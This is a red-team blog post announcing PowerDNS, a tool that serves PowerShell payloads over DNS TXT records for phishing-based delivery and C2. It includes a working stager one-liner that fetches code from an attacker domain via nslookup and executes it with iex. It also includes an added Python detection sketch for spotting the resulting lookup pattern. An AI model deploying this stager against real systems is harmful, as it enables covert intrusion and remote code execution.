ActiveBreach

PowerShell DNS Delivery with PowerDNS

Delivery of staged and stageless payloads is often achieved using the PowerShell web delivery technique. While this is a highly effective strategy for staging, in some cases it can be prone to failure: proxies blocking the request due to categorisation, incompatible malleable profiles, or your payload simply reaching a non-domain-joined user or a user without proxy credentials. DNS, however, is often a reliable means of egress and does not suffer from such pitfalls.

With this in mind, we developed PowerDNS, a simple proof of concept for delivering PowerShell payloads using DNS as an egress channel. The primary use case for PowerDNS is the execution of stageless DNS payloads, which would ultimately allow you to perform DNS-only delivery and C2. While this could be achieved using CACTUSTORCH to embed a stageless DNS payload, PowerDNS has additional operational security advantages, such as not touching disk and separating the implant from the phishing payloads, thus making it more complex for the blue team to reconstruct or investigate an attack.

Understanding PowerDNS

In order to use PowerDNS, you require an authoritative nameserver for a domain under your control. PowerDNS leverages scapy to listen for DNS TXT requests for the given domain. On launch, the PowerShell script that you want to execute is first read, base64 encoded and split into chunks. Each DNS request made by the client corresponds to an entry within the chunk list. For example, 1.foo.bar would retrieve element 1 in the chunk list. The first element in the list is the DNS stager code; this is essentially a PowerShell loop that will iterate over the following chunks, then decode and execute the PowerShell script. The DNS stager code will look as follows:

[code]for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.foo.bar')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))[/code]

PowerDNS attempts to maintain compatibility with older versions of PowerShell by using nslookup to retrieve the TXT record, as opposed to the PowerShell DNS cmdlets which are only available in PowerShell version 3.0 or later.
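The lookup pattern described above (one client requesting TXT records for 1.foo.bar, 2.foo.bar and so on) stands out in resolver logs. The following detection sketch is an added example, not part of PowerDNS or the original post; the log line format, the function names and the `min_run` threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample resolver log; assumed format: "time client qtype qname".
SAMPLE_LOG = """\
10:00:01 10.0.0.5 TXT 1.foo.bar
10:00:01 10.0.0.5 TXT 2.foo.bar
10:00:02 10.0.0.5 TXT 3.foo.bar
10:00:05 10.0.0.5 TXT 3.foo.bar
10:00:05 10.0.0.5 TXT 4.foo.bar
10:00:06 10.0.0.5 TXT 5.foo.bar
10:00:06 10.0.0.5 TXT 6.foo.bar
10:00:07 10.0.0.9 TXT _dmarc.example.com
10:00:08 10.0.0.9 A 2.pool.example.org
10:00:09 10.0.0.7 TXT 1.example.net
10:00:09 10.0.0.7 TXT 7.example.net
"""

NUMBERED = re.compile(r"^(\d+)\.(.+)$")  # "<index>.<parent domain>"


def longest_run(indices):
    """Length of the longest run of consecutive integers in a set."""
    best = run = 0
    prev = None
    for n in sorted(indices):
        run = run + 1 if prev is not None and n == prev + 1 else 1
        best = max(best, run)
        prev = n
    return best


def find_numbered_txt_runs(log_text, min_run=5):
    """Map (client, parent domain) -> run length for numbered TXT lookups."""
    seen = defaultdict(set)  # a set, so a retried query counts once
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2].upper() != "TXT":
            continue  # skip malformed lines and non-TXT query types
        match = NUMBERED.match(parts[3].rstrip(".").lower())
        if match:
            seen[(parts[1], match.group(2))].add(int(match.group(1)))
    runs = {key: longest_run(idx) for key, idx in seen.items()}
    return {key: n for key, n in runs.items() if n >= min_run}


if __name__ == "__main__":
    for (client, domain), n in find_numbered_txt_runs(SAMPLE_LOG).items():
        print(f"{client} fetched {n} consecutive numbered TXT records under {domain}")
```

Grouping by client and parent domain keeps unrelated numeric hostnames from different sources from combining into a false run.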

When PowerDNS launches, it will provide the user with a DNS download cradle that can be run on the target host, or embedded in a phishing payload such as an HTA or macro-enabled document. An example is shown below which demonstrates PowerDNS hosting a Cobalt Strike PowerShell payload, then serving it over DNS to the Windows client that has executed a malicious HTA file.

Presently, PowerDNS does not attempt to obfuscate or obscure the PowerShell commands that are executed. This could however be performed using @danielbohannon’s Invoke-CradleCrafter.

A video of PowerDNS in action is shown below:

PowerDNS can be downloaded from the MDSec ActiveBreach Github page.

PowerDNS was developed by @domchell of the MDSec ActiveBreach team.

Written by Dominic Chell

Copyright 2020 MDSec